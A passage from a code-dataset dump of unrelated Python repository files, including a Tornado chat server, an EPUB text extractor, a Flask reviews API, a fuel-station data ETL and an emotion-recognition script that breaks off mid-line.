self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._sock.bind((host,port))\n self._sock.listen(128)\n ioloop.IOLoop.instance().add_handler(self._sock.fileno(),\n self.handle_accept,\n ioloop.IOLoop.READ)\n\n self.host = host\n self.port = port\n\n\n\ndefine('host', default=\"0.0.0.0\", help=\"The binded ip host\")\ndefine('port', default=8005, type=int, help='The port to be listened')\n\nif __name__ == '__main__':\n \n log.debug('parsing command line')\n tornado.options.parse_command_line()\n\n log.debug('creating server')\n server = Server()\n\n log.debug('starting server')\n server.start(options.host, options.port)\n\n ioloop.IOLoop.instance().start()\n\n","repo_name":"rranshous/pychat","sub_path":"push_server.py","file_name":"push_server.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27725906238","text":"import sys\nsys.path.append(\".\")\nimport argparse\nimport datetime\nimport numpy as np\nimport os\nimport shutil\nimport torch\n\nfrom brainpedia.brainpedia import Brainpedia\nfrom models.classifier import Classifier\nfrom scipy.stats import entropy\nfrom torch.autograd import Variable\n\n\nparser = argparse.ArgumentParser(description=\"Train classifiers on real and synthetic data.\")\nparser.add_argument('synthetic_data_dir', help='the directory containing synthetic fMRI data')\nparser.add_argument('synthetic_data_dir_cache', help='the directory to use as a cache for the preprocessed synthetic fMRI data')\nparser.add_argument('classifier_state_dict_path', help='path to a file containing the classifier model state dict')\nparser.add_argument('output_dir', help='the directory to save evaluation results')\nargs = parser.parse_args()\n\n# ========== HOUSEKEEPING ==========\nCUDA = torch.cuda.is_available()\nif CUDA:\n print(\"Using GPU optimizations!\")\n\nnp.random.seed(1)\ntorch.manual_seed(1)\nif CUDA:\n torch.cuda.manual_seed(1)\n\nshutil.rmtree(args.output_dir, ignore_errors=True)\nos.makedirs(args.output_dir)\n\n# ========== HYPERPARAMETERS ==========\nDOWNSAMPLE_SCALE = 0.25\nMULTI_TAG_LABEL_ENCODING = False\nCLASSIFIER_DIMENSIONALITY = 64\nBATCH_SIZE = 16\n\nresults_f = open(args.output_dir + 'results.txt', 'w')\nresults_f.write('DATE: {0}\\n\\n'.format(datetime.datetime.now().strftime('%b-%d-%I%M%p-%G')))\nresults_f.write('DOWNSAMPLE_SCALE: {0}\\n'.format(DOWNSAMPLE_SCALE))\nresults_f.write('MULTI_TAG_LABEL_ENCODING: {0}\\n'.format(MULTI_TAG_LABEL_ENCODING))\nresults_f.write('CLASSIFIER_DIMENSIONALITY: {0}\\n'.format(CLASSIFIER_DIMENSIONALITY))\nresults_f.write('BATCH_SIZE: {0}\\n'.format(BATCH_SIZE))\nresults_f.write('=====================================================\\n\\n\\n')\n\n# ========== INCEPTION SCORE ==========\n\n\ndef inception_score(path_to_generated_imgs_dir,\n path_to_generated_imgs_dir_cache,\n downsample_scale,\n path_to_classifier,\n classifier_dimensionality,\n cuda_enabled,\n batch_size,\n splits):\n # Set up data\n generated_brainpedia = Brainpedia(data_dirs=[path_to_generated_imgs_dir],\n cache_dir=path_to_generated_imgs_dir_cache,\n scale=downsample_scale,\n multi_tag_label_encoding=MULTI_TAG_LABEL_ENCODING)\n generated_brain_data_shape, generated_brain_data_tag_shape = generated_brainpedia.sample_shapes()\n all_generated_brain_data, all_generated_brain_data_tags = generated_brainpedia.all_data()\n all_generated_brain_data = Variable(torch.Tensor(all_generated_brain_data))\n\n if cuda_enabled:\n all_generated_brain_data = all_generated_brain_data.cuda()\n\n # Load classifier model\n classifier = Classifier(dimensionality=classifier_dimensionality,\n num_classes=generated_brain_data_tag_shape[0],\n cudaEnabled=cuda_enabled)\n classifier.load_state_dict(torch.load(path_to_classifier))\n\n # Compute predictions\n predictions = classifier.forward(all_generated_brain_data).data.cpu().numpy()\n\n # Now compute the mean kl-div\n N = len(all_generated_brain_data)\n split_scores = []\n\n for k in range(splits):\n part = predictions[k * (N // splits): (k + 1) * (N // splits), :]\n py = np.mean(part, axis=0)\n scores = []\n for i in range(part.shape[0]):\n pyx = part[i, :]\n scores.append(entropy(pyx, py))\n split_scores.append(np.exp(np.mean(scores)))\n\n return np.mean(split_scores), np.std(split_scores)\n\n\ninception_score = inception_score(path_to_generated_imgs_dir=args.synthetic_data_dir,\n path_to_generated_imgs_dir_cache=args.synthetic_data_dir_cache,\n downsample_scale=DOWNSAMPLE_SCALE,\n path_to_classifier=args.classifier_state_dict_path,\n classifier_dimensionality=CLASSIFIER_DIMENSIONALITY,\n cuda_enabled=CUDA,\n batch_size=BATCH_SIZE,\n splits=10)\n\ninception_score_str = \"INCEPTION SCORE: {0}\".format(inception_score)\nprint(inception_score_str)\nresults_f.write(inception_score_str)\n","repo_name":"BlissChapman/ICW-fMRI-GAN","sub_path":"evaluation/inception_score_evaluation.py","file_name":"inception_score_evaluation.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"37064058257","text":"\nimport zipfile\nfrom lxml import etree\n\ndef get_epub_info(fname):\n ns = {\n 'n':'urn:oasis:names:tc:opendocument:xmlns:container',\n 'pkg':'http://www.idpf.org/2007/opf',\n 'dc':'http://purl.org/dc/elements/1.1/'\n }\n\n # prepare to read from the .epub file\n zip = zipfile.ZipFile(fname)\n\n # find the contents metafile\n txt = zip.read('META-INF/container.xml')\n tree = etree.fromstring(txt)\n cfname = tree.xpath('n:rootfiles/n:rootfile/@full-path',namespaces=ns)[0]\n\n # grab the metadata block from the contents metafile\n cf = zip.read(cfname)\n tree = etree.fromstring(cf)\n p = tree.xpath('/pkg:package/pkg:metadata',namespaces=ns)[0]\n\n # repackage the data\n res = {}\n for s in ['title','language','creator','date','identifier']:\n res[s] = p.xpath('dc:%s/text()'%(s),namespaces=ns)[0]\n\n return res\n\n\nimport ebooklib\nfrom ebooklib import epub\ndef epub2thtml(epub_path):\n book = epub.read_epub(epub_path)\n chapters = []\n for item in book.get_items():\n if item.get_type() == ebooklib.ITEM_DOCUMENT:\n chapters.append(item.get_content())\n return chapters\n#epub2thtml(ebook) \n\nfrom bs4 import BeautifulSoup\nblacklist = [ '[document]', 'noscript', 'header', 'html', 'meta', 'head','input', 'script', \"style\" ]\n# there may be more elements you don't want, such as \"style\", etc.\ndef chap2text(chap):\n output = ''\n soup = BeautifulSoup(chap, 'html.parser')\n text = soup.find_all(text=True)\n for t in text:\n if t.parent.name not in blacklist:\n output += '{} '.format(t)\n return output\n\ndef thtml2ttext(thtml):\n Output = []\n for html in thtml:\n text = chap2text(html)\n # Remove accents\n a,b = 'áéíóúü','aeiouu'\n trans = str.maketrans(a,b)\n text = text.lower().translate(trans)\n Output.append(text)\n return Output\n\n\n\ndef epub2text(epub_path):\n chapters = epub2thtml(epub_path)\n ttext = thtml2ttext(chapters)\n return ttext\n\ndef filter_nonprintable(text):\n import itertools\n # Use characters of control category\n nonprintable = itertools.chain(range(0x00,0x20),range(0x7f,0xa0))\n # Use translate to remove all non-printable characters\n return text.translate({character:None for character in nonprintable})\ndef epub_to_clean_text(ebook):\n \"\"\"\n Convert an epub to text\n Arguments:\n ----------\n ebook: Path to the file\n \"\"\"\n out = epub2text(ebook)\n text=\"\"\n for chapter in out : \n text += filter_nonprintable(chapter) \n return text\n\n\n","repo_name":"jaimevalero/books_recommendation","sub_path":"books_recommendation/epubtotext.py","file_name":"epubtotext.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2981954779","text":"import sys\nfrom abc import abstractmethod\nfrom dataclasses import dataclass\nfrom enum import IntEnum\nfrom typing import Optional\n\nfrom PyQt5.QtCore import QRunnable, QObject, pyqtSlot, pyqtSignal\n\n\nclass Worker(QRunnable):\n \"\"\"\n Base QRunnable class.\n\n This class provides a base for QRunnables with signals that are automatically deleted.\n\n To use this class you have to assign the signals object of your concrete implementation\n to the `Worker.signals` attribute and implement `Worker.run_real()`\n \"\"\"\n\n def __init__(self):\n super(Worker, self).__init__()\n self.setAutoDelete(True)\n self.__signals: Optional[QObject] = None\n\n @property\n def signals(self) -> QObject:\n if self.__signals is None:\n raise RuntimeError(f\"Subclasses must assign '{type(self).__name__}.signals' QObject attribute\")\n return self.__signals\n\n @signals.setter\n def signals(self, obj: QObject):\n self.__signals = obj\n\n @abstractmethod\n def run_real(self):\n pass\n\n @pyqtSlot()\n def run(self):\n self.run_real()\n self.signals.deleteLater()\n\n\nclass QueueWorkerState(IntEnum):\n UNDEFINED = 0\n QUEUED = 1\n ACTIVE = 2\n\n\n@dataclass\nclass QueueWorkerInfo:\n app_name: str\n app_title: str\n worker_type: str\n state: QueueWorkerState\n progress: int = 0\n\n\nclass QueueWorker(Worker):\n \"\"\"\n Base queueable worker class\n\n This class is a specialization of the `Worker` class. It provides feedback signals to know\n if a worker has started or finished.\n\n To use this class you have to assign the signals object of your concrete implementation\n to the `QueueWorker.signals` attribute, implement `QueueWorker.run_real()` and `QueueWorker.worker_info()`\n \"\"\"\n\n class Signals(QObject):\n started = pyqtSignal()\n finished = pyqtSignal()\n\n def __init__(self):\n super(QueueWorker, self).__init__()\n self.feedback = QueueWorker.Signals()\n self.state = QueueWorkerState.QUEUED\n self._kill = False\n\n @pyqtSlot()\n def run(self):\n self.state = QueueWorkerState.ACTIVE\n self.feedback.started.emit()\n super(QueueWorker, self).run()\n self.feedback.finished.emit()\n self.feedback.deleteLater()\n\n @abstractmethod\n def worker_info(self) -> QueueWorkerInfo:\n pass\n\n def kill(self):\n raise NotImplementedError\n self._kill = True\n\n","repo_name":"Dummerle/Rare","sub_path":"rare/shared/workers/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"40"} +{"seq_id":"29429558499","text":"'''\r\nThis proxy will help you to run your telegram bot on pythonanywhere no free hosting\r\n'''\r\n# start of online server proxy config\r\n\r\nimport urllib3\r\nimport telepot.api\r\nproxy_url = 'http://proxy.server:3128'\r\n\r\ntelepot.api._pools = {\r\n 'default': urllib3.ProxyManager(proxy_url=proxy_url, num_pools=3, maxsize=10, retries=False, timeout=30), }\r\n\r\ntelepot.api._onetime_pool_spec = (urllib3.ProxyManager, dict(proxy_url=proxy_url, num_pools=1, maxsize=1,\r\n retries=False, timeout=30))\r\n\r\n# end of online server proxy config\r\n","repo_name":"abdimk/babylon","sub_path":"babylon Translator/telepot proxy.py","file_name":"telepot proxy.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"71543047801","text":"#!/usr/bin/python\n# -*- coding: iso-8859-15 -*-\n\n# motion_compress.py\n\n# Comprime los datos sobre el movimiento. Se elimina la redundancia\n# entre bandas temporales y la redundancia bidireccional. La primera\n# expresa que si en la subbanda \"i+1\" una componente de un vector vale\n# \"2x\", en la subbanda \"i\" dicha componente del correspondiente vector\n# debería valer \"x\". La segunda se debe a que si una componente hacia\n# atrás vale \"-x\", la correspondiente componente hacia adelante\n# debería valer \"x\". Finalmente se utiliza un codificador entrópico\n# reversible que comprime los residuos.\n\nimport os\nimport sys\nfrom GOP import GOP\nfrom subprocess import check_call\nfrom subprocess import CalledProcessError\nfrom MCTF_parser import MCTF_parser\n\n#MOTION_CODER_NAME = \"gzip\"\n#MOTION_CODER_NAME = \"kdu_v_compress\"\nMCTF_MOTION_CODEC = os.environ[\"MCTF_MOTION_CODEC\"]\n\nblock_size = 16\nblock_size_min = 16\nGOPs = 1\npixels_in_x = 352\npixels_in_y = 288\nTRLs = 5\n\nparser = MCTF_parser(description=\"Compress the motion data.\")\nparser.block_size(block_size)\nparser.block_size_min(block_size_min)\nparser.GOPs(GOPs)\nparser.pixels_in_x(pixels_in_x)\nparser.pixels_in_y(pixels_in_y)\nparser.TRLs(TRLs)\n\nargs = parser.parse_known_args()[0]\nif args.block_size:\n block_size = int(args.block_size)\nif args.block_size_min:\n block_size_min = int(args.block_size_min)\nif args.GOPs:\n GOPs = int(args.GOPs)\nif args.pixels_in_x:\n pixels_in_x = int(args.pixels_in_x)\nif args.pixels_in_y:\n pixels_in_y = int(args.pixels_in_y)\nif args.TRLs:\n TRLs = int(args.TRLs)\n\nif block_size < block_size_min:\n block_size_min = block_size\n\n# Los campos de movimiento se comprimen sin pérdida, generando un\n# fichero independiente para cada nivel de resolución temporal en un\n# stream diferente y para cada GOP. La compresión se realiza pensando\n# en cómo el descompresor va a realizar la descompresión. El\n# descompresor se va a encontrar en el primer nivel que un campo de\n# movimiento bidireccional ha sido, únicamente, descorrelacionado\n# bidireccionalmente (la descorrelación bidireccional explota la\n# redundancia que existe en un vector bidireccional, donde el vector\n# en un sentido suele ser igual que el otro, aunque con signo\n# contrario). Una vez que el campo del primer nivel ha sido\n# restaurado, puede servir de referencia para dos campos del siguiente\n# nivel de resolución (descorrelación interlevel). En concreto,\n# dividimos entre dos los vectores de movimiento y ya tenemos la\n# predicción. En este segundo nivel de resolución (y los siguientes)\n# no es necesario descorrelacionarlo(s) bidireccionalmente ya que la\n# descorrelación interlevel, al partir de campos bidireccionales\n# correlacionados, va a provocar la descorrelación bidireccional de\n# forma automática.\n\ngop=GOP()\nGOP_size = gop.get_size(TRLs)\npictures = GOPs * GOP_size + 1\n\n# Comenzamos aplicando la descorrelacion interlevel.\niterations = TRLs - 1\niteration = 1\nfields = pictures / 2\nblocks_in_y = pixels_in_y / block_size\nblocks_in_x = pixels_in_x / block_size\n\n\nwhile iteration < iterations:\n\n # Descorrelacionamos los campos de movimiento entre niveles de\n # resolución. \n try:\n check_call(\"mctf interlevel_motion_decorrelate\"\n + \" --blocks_in_x=\" + str(blocks_in_x)\n + \" --blocks_in_y=\" + str(blocks_in_y)\n + \" --fields_in_predicted=\" + str(fields)\n + \" --predicted=\" + \"motion_filtered_\" + str(iteration)\n + \" --reference=\" + \"motion_filtered_\" + str(iteration+1)\n + \" --residue=\" + \"motion_residue_\" + str(iteration),\n shell=True)\n except CalledProcessError:\n sys.exit(-1)\n\n# Calculamos el tamaño de bloque usado en esta iteración temporal.\n block_size = block_size / 2\n if (block_size < block_size_min):\n block_size = block_size_min\n\n fields /= 2\n iteration += 1\n blocks_in_y = pixels_in_y / block_size\n blocks_in_x = pixels_in_x / block_size\n\n# Ahora descorrelacionamos bidireccionalmente el nivel de resolución\n# temporal más bajo. El último número de bloques en X y en Y calculado\n# en el lazo anterior debería servir en este instante. Lo mismo ocurre\n# con la variable \"iteration\".\ntry:\n check_call(\"mctf bidirectional_motion_decorrelate\"\n + \" --blocks_in_x=\" + str(blocks_in_x)\n + \" --blocks_in_y=\" + str(blocks_in_y)\n + \" --fields=\" + str(fields)\n + \" --input=\" + \"motion_filtered_\" + str(iteration)\n + \" --output=\" + \"motion_residue_\" + str(iteration),\n shell=True\n )\nexcept CalledProcessError:\n sys.exit(-1)\n\n# Eliminamos del flujo de campos de movimiento aquellos campos que ya\n# no se utilizan porque hacen referencia a imágenes I.\n\n# Finalmente, comprimimos. \niteration = 1\nfields = pictures / 2\nwhile iteration <= iterations:\n\n try:\n check_call(\"mctf motion_compress_\" + MCTF_MOTION_CODEC\n + \" --blocks_in_x=\" + str(blocks_in_x)\n + \" --blocks_in_y=\" + str(blocks_in_y)\n + \" --iteration=\" + str(iteration)\n + \" --fields=\" + str(fields)\n + \" --file=\" + \"motion_residue_\" + str(iteration),\n shell=True\n )\n except CalledProcessError:\n sys.exit(-1)\n\n fields /= 2\n\n iteration += 1\n\n","repo_name":"josejuansanchez/cr_mc_j2k","sub_path":"MCTF/src/motion_compress.py","file_name":"motion_compress.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21983170437","text":"import os\nimport time\nfrom pathlib import Path as caminho\n\nimport pandas as pd\n\nfrom B_Def_Global import (\n GetEnv,\n conecta_bd_generico,\n convert_tempo,\n criar_chaves_estrangeiras_tabelas,\n criar_chaves_primaria_tabelas,\n download_arquiv_barprogress,\n funçao_barprogress,\n inserir_dados_faltantes_tabelas,\n leitura_csv_insercao_bd_sql,\n limpar_terminal,\n log_retorno_erro,\n log_retorno_info,\n print_divisor_inicio_fim,\n print_parcial_final_log_inf_retorno,\n remover_repetidos_tabelas,\n verificar_dados_faltantes_tabelas,\n verificar_repetidos_tabelas,\n)\nfrom Z_Logger import Logs\n\nlogs = Logs(filename=\"logs.log\")\n\n\ndef postos_combustiveis_anp():\n \"\"\"Função para baixar os dados de postos_combustiveis na API anp\n \"\"\"\n\n path_anp = GetEnv('ANP_FILES_PATH')\n url_api = GetEnv('URL_ANP_POSTO_COMBUSTIVEIS')\n name_file = 'tb_postos_combustiveis_anp'\n ext_file = '.csv'\n file_path = os.path.join(path_anp, name_file+ext_file)\n\n try:\n insert_start = time.time()\n\n download_arquiv_barprogress(url_api,\n name_file,\n '.csv',\n file_path,\n False)\n\n tmp = pd.read_csv(file_path,\n # index_col=False,\n sep=';',\n encoding='ANSI')\n\n # Converter para o formato de data style '%y%m%d'\n tmp['DATAPUBLICACAO'] = pd.to_datetime(\n tmp['DATAPUBLICACAO']).dt.date\n tmp['DATAVINCULACAO'] = pd.to_datetime(\n tmp['DATAVINCULACAO']).dt.date\n\n print(tmp)\n\n path = caminho(file_path)\n path.unlink()\n\n # Salvar dataframe em um csv\n local_save_csv = os.path.join(path_anp, name_file+ext_file)\n\n # print(local_save_csv)\n tmp.to_csv(local_save_csv,\n index=None, # Não usar índice\n encoding='utf-8' # Usar formato UTF-8 para marter formatação\n , sep=';') # Usar ponto e virgula\n # , na_rep='0') # Susbstituir NaN por 0\n\n insert_end = time.time()\n\n print_parcial_final_log_inf_retorno('download',\n insert_start,\n insert_end,\n name_file,\n 'parcial')\n\n except Exception as text:\n\n log_retorno_erro(text)\n\n\ndef inserir_dados_anp_bd():\n \"\"\"Função para inserir arquivos csv no banco de dados postgres\n \"\"\"\n\n try:\n\n insert_start = time.time()\n\n extracted_files = GetEnv('ANP_FILES_PATH')\n\n # Dados arquivo/tabela (municipios_anp)\n # Criar tabela\n table_create_sql_postos_combustiveis_anp = r'''\n CREATE TABLE IF NOT EXISTS \"tb_anp_postos_combustiveis\" (\n \"cod_simp_anp\" INT, \n \"autorizacao_anp\" varchar(16), \n \"data_publicacao_anp\" DATE,\n \"razao_social_anp\" varchar(255), \n \"id_cnpj_completo_anp\" BIGINT, \n \"endereco_anp\" varchar(255),\n \"complemento_anp\" varchar(255),\n \"bairro_anp\" varchar(255),\n \"cep_anp\" varchar(12),\n \"uf_anp\" varchar(4),\n \"municipio_anp\" varchar(255),\n \"bandeira_anp\" varchar(25),\n \"data_vinculacao_anp\" DATE);\n '''\n # Inserir csv para o banco de dados\n leitura_csv_insercao_bd_sql('tb_postos_combustiveis_anp',\n 'tb_anp_postos_combustiveis',\n table_create_sql_postos_combustiveis_anp,\n 'anp',\n extracted_files)\n\n insert_end = time.time()\n\n print_parcial_final_log_inf_retorno('',\n insert_start,\n insert_end,\n '',\n 'final')\n\n print_parcial_final_log_inf_retorno(f'inserção no banco de dados os dados do ANP',\n insert_start,\n insert_end,\n '',\n 'geral')\n\n except Exception as text:\n\n log_retorno_erro(text)\n\n\ndef dados_faltantes_anp():\n \"\"\"Função para remover cnpj repetidos das tabelas especificadas\n \"\"\"\n\n try:\n\n insert_start = time.time()\n base_dados = GetEnv('DB_NAME')\n\n def faltantes_estabelecimentos():\n\n # Inserir valores faltantes da tabela país\n tabela_temp = 'tb_anp_postos_combustiveis'\n tabela_temp_origem = 'tb_rfb_estabelecimentos'\n coluna_temp1 = 'id_cnpj_completo_anp'\n coluna_temp1_origem = 'id_cod_cnpj_completo_num'\n output_erros = (os.path.join(GetEnv('ANP_OUTPUT_ERROS_PATH'),\n f'FALTANTES_CNPJ_{tabela_temp_origem}.csv'))\n\n '''verificar_dados_faltantes_tabelas(base_dados,\n tabela_temp,\n tabela_temp_origem,\n coluna_temp1,\n coluna_temp1_origem,\n 1,\n output_erros)'''\n\n nome_coluna_temp1 = 'id_cod_cnpj_completo_num'\n nome_coluna_temp2 = 'nome_fantasia'\n\n inserir_dados_faltantes_tabelas(base_dados,\n tabela_temp,\n tabela_temp_origem,\n coluna_temp1,\n coluna_temp1_origem,\n nome_coluna_temp1,\n nome_coluna_temp2,\n 1,\n output_erros)\n\n insert_end = time.time()\n\n print_parcial_final_log_inf_retorno(f'verificação/inserção de valores faltantes nas tabelas na {base_dados}',\n insert_start,\n insert_end,\n '',\n 'geral')\n\n funçao_barprogress([faltantes_estabelecimentos],\n 'green')\n\n except Exception as text:\n\n log_retorno_erro(text)\n\n\ndef criar_indices_anp():\n \"\"\"Função para criar indices nas tabelas especificadas\n \"\"\"\n\n try:\n\n insert_start = time.time()\n base_dados = GetEnv('DB_NAME')\n\n def chaves_estrangeiras():\n\n def chave_postos_combustiveis_anp():\n\n # Crias chaves Estrangeiras nas tabela estabelecimentos para municipios RFB\n tabela_temp = 'tb_anp_postos_combustiveis'\n tabela_temp_origem = 'tb_rfb_estabelecimentos'\n nome_fk_coluna = 'FK_id_cod_cnpj_completo_num'\n coluna_temp1 = 'id_cnpj_completo_anp'\n coluna_temp1_origem = 'id_cod_cnpj_completo_num'\n\n criar_chaves_estrangeiras_tabelas(base_dados,\n tabela_temp,\n tabela_temp_origem,\n nome_fk_coluna,\n coluna_temp1,\n coluna_temp1_origem)\n chave_postos_combustiveis_anp()\n\n chaves_estrangeiras()\n\n insert_end = time.time()\n\n print_parcial_final_log_inf_retorno(f'criação de chaves primárias e estrangeiras nas tabelas na {base_dados}',\n insert_start,\n insert_end,\n '',\n 'geral')\n\n except Exception as text:\n\n log_retorno_erro(text)\n\n\ndef sequencia_anp():\n\n try:\n\n insert_start = time.time()\n base_dados = GetEnv('DB_NAME')\n\n limpar_terminal()\n\n funçao_barprogress([postos_combustiveis_anp,\n inserir_dados_anp_bd,\n dados_faltantes_anp,\n criar_indices_anp],\n 'red')\n\n insert_end = time.time()\n\n print_parcial_final_log_inf_retorno(f'inserção no banco, remoção de cnpj duplicados e crição de chaves primárias e estrangeiras nas tabelas do ANP na {base_dados}',\n insert_start,\n insert_end,\n '',\n 'geral')\n\n except Exception as text:\n\n log_retorno_erro(text)\n\n# sequencia_anp():\n","repo_name":"allanbmartins/Projeto_ETL_RFB_IBGE_ANP","sub_path":"src/E_Script_ANP.py","file_name":"E_Script_ANP.py","file_ext":"py","file_size_in_byte":9205,"program_lang":"python","lang":"pt","doc_type":"code","stars":36,"dataset":"github-code","pt":"40"} +{"seq_id":"2093985689","text":"import numpy as np\n\nempContactsArray = np.zeros((75, 75), int)\nday1 = np.zeros((75, 75), int)\nday2 = np.zeros((75, 75), int)\nday3 = np.zeros((75, 75), int)\nday4 = np.zeros((75, 75), int)\n\nsecondsInDay = 86400\n\ntemporalEdgeList = open('Data/temporalEdgeList.txt')\nnext(temporalEdgeList)\nfor line in temporalEdgeList:\n splitLine = line.rstrip().split('\\t')\n t = int(splitLine[0])\n i = int(splitLine[1])\n j = int(splitLine[2])\n Si = splitLine[3]\n Sj = splitLine[4]\n empContactsArray[i][j] += 1\n empContactsArray[j][i] += 1\n\n if t <= secondsInDay:\n day1[i][j] += 1\n day1[j][i] += 1\n elif t <= (secondsInDay*2):\n day2[i][j] += 1\n day2[j][i] += 1\n elif t <= (secondsInDay*3):\n day3[i][j] += 1\n day3[j][i] += 1\n elif t <= (secondsInDay*4):\n day4[i][j] += 1\n day4[j][i] += 1\n \ntemporalEdgeList.close()\n\nempDailyContactArrays = [day1, day2, day3, day4]\n","repo_name":"mariebergan/Hospital","sub_path":"Model/empContacts.py","file_name":"empContacts.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12873259538","text":"#!/usr/bin/python3\n\"\"\"A view for reviews of places\"\"\"\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.place import Place\nfrom models.review import Review\nfrom models.user import User\nfrom flask import jsonify, abort, request\n\n\n@app_views.route('/places/<place_id>/reviews', strict_slashes=False,\n methods=[\"GET\"])\ndef get_reviews(place_id):\n \"\"\"Retrieve reviews for a place\"\"\"\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n reviews = storage.all(Review)\n review_list = []\n\n for k, v in reviews.items():\n if v.place_id == place_id:\n review_list.append(v.to_dict())\n return jsonify(review_list)\n\n\n@app_views.route('/reviews/<review_id>', strict_slashes=False, methods=[\"GET\"])\ndef get_review(review_id):\n \"\"\"Retrieve a review\"\"\"\n review = storage.get(Review, review_id)\n if not review:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n\n return jsonify(review.to_dict())\n\n\n@app_views.route('/reviews/<review_id>', strict_slashes=False,\n methods=[\"DELETE\"])\ndef delete_review(review_id):\n \"\"\"Delete a review\"\"\"\n review = storage.get(Review, review_id)\n if not review:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n storage.delete(review)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route('/places/<place_id>/reviews', strict_slashes=False,\n methods=[\"POST\"])\ndef create_review(place_id):\n \"\"\"Create a review\"\"\"\n if not request.json:\n abort(400)\n return jsonify({\"error\": \"Not a JSON\"})\n if 'user_id' not in request.json:\n abort(400)\n return jsonify({\"error\": \"Missing user_id\"})\n if 'text' not in request.json:\n abort(400)\n return jsonify({\"error\": \"Missing text\"})\n\n place = storage.get(Place, place_id)\n if not place:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n user = storage.get(User, request.get_json()['user_id'])\n if not user:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n\n new_review = Review(**request.get_json())\n setattr(new_review, 'place_id', place_id)\n new_review.save()\n return jsonify(new_review.to_dict()), 201\n\n\n@app_views.route('/reviews/<review_id>', strict_slashes=False, methods=[\"PUT\"])\ndef update_review(review_id):\n \"\"\"Update a review\"\"\"\n if not request.json:\n abort(400)\n return jsonify({\"error\": \"Not a JSON\"})\n\n review_atr = request.get_json(silent=True)\n review = storage.get(Review, review_id)\n if not review:\n abort(404)\n return jsonify({\"error\": \"Not found\"})\n\n for k, v in review_atr.items():\n if k not in [\"id\", \"created_at\", \"updated_at\", \"user_id\", \"place_id\"]:\n setattr(review, k, v)\n\n review.save()\n return jsonify(review.to_dict())\n","repo_name":"Hoseafavour123/AirBnB_clone_v3","sub_path":"api/v1/views/places_reviews.py","file_name":"places_reviews.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"10790462415","text":"# Time: O(n)\n# Space: O(1)\n\nimport collections\n\n\nclass Solution(object):\n def slowestKey(self, releaseTimes, keysPressed):\n \"\"\"\n :type releaseTimes: List[int]\n :type keysPressed: str\n :rtype: str\n \"\"\"\n result, lookup = 'a', collections.Counter()\n for i, c in enumerate(keysPressed):\n lookup[c] = max(lookup[c], releaseTimes[i]-(releaseTimes[i-1] if i > 0 else 0))\n if lookup[c] > lookup[result] or lookup[c] == lookup[result] and c > result:\n result = c\n return result\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/slowest-key.py","file_name":"slowest-key.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"71551636281","text":"def solution(participant, completion):\n hash_dict = {}\n sum_hash = 0\n\n # hash - key, value pair라는게 존재하고, 딕셔너리라는 자료구조\n # [hash(part)] - key / part - value\n\n # 1. participant list의 hash를 구하고, hash 값을 더한다.\n for part in participant:\n hash_dict[hash(part)] = part\n sum_hash += hash(part)\n\n # 2. completion list의 hash를 빼준다.\n for comp in completion:\n sum_hash -= hash(comp)\n\n # 3. 남은 값이 완주하지 못한 선수의 hash 값이 된다.\n return hash_dict[sum_hash]\n\n\nprint(solution([\"leo\", \"kiki\", \"eden\"], [\"eden\", \"kiki\"]))","repo_name":"DevYJShin/Algorithm_Programmers","sub_path":"28_완주하지못한선수.py","file_name":"28_완주하지못한선수.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20620715089","text":"#Import required modules\nimport cv2\nimport glob\nimport random\nimport math\nimport numpy as np\nimport dlib\nimport itertools\nfrom sklearn.svm import SVC\nimport pickle\nimport sys\nimport os\n\nemotions = [\"anger\", \"disgust\", \"fear\", \"happy\", \"sadness\", \"surprise\",\"neutral\"] #Define emotions\nnew_emotions = [\"anger\",\"happy\", \"neutral\", \"sadness\"] #Define emotions\ndest='F:\\Chaos\\EmotionRecognition\\Application\\Results'\n\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\ndetector = dlib.get_frontal_face_detector() #Face detector\npredictor = dlib.shape_predictor(\"F:\\Chaos\\EmotionRecognition\\Download_CK+\\shape_predictor_68_face_landmarks.dat\\shape_predictor_68_face_landmarks.dat\") #Landmark identifier. Set the filename to whatever you named the downloaded file\ndir2='F:\\Chaos\\EmotionRecognition\\Application\\model\\images'\ndir1='F:\\Chaos\\EmotionRecognition\\Application\\\\testData'\ndir3='F:\\Chaos\\EmotionRecognition\\Application\\dataset'\ndir4='F:\\Chaos\\EmotionRecognition\\Application\\\\trainData'\ndir5='F:\\Chaos\\EmotionRecognition\\Application\\sorted_set'\n\ndef shuffle_files(emotion):\n\n files = glob.glob(dir5+\"\\\\\"+emotion+\"\\*\")\n random.shuffle(files)\n training = files[:int(len(files)*0.8)] #get first 80% of file list\n prediction = 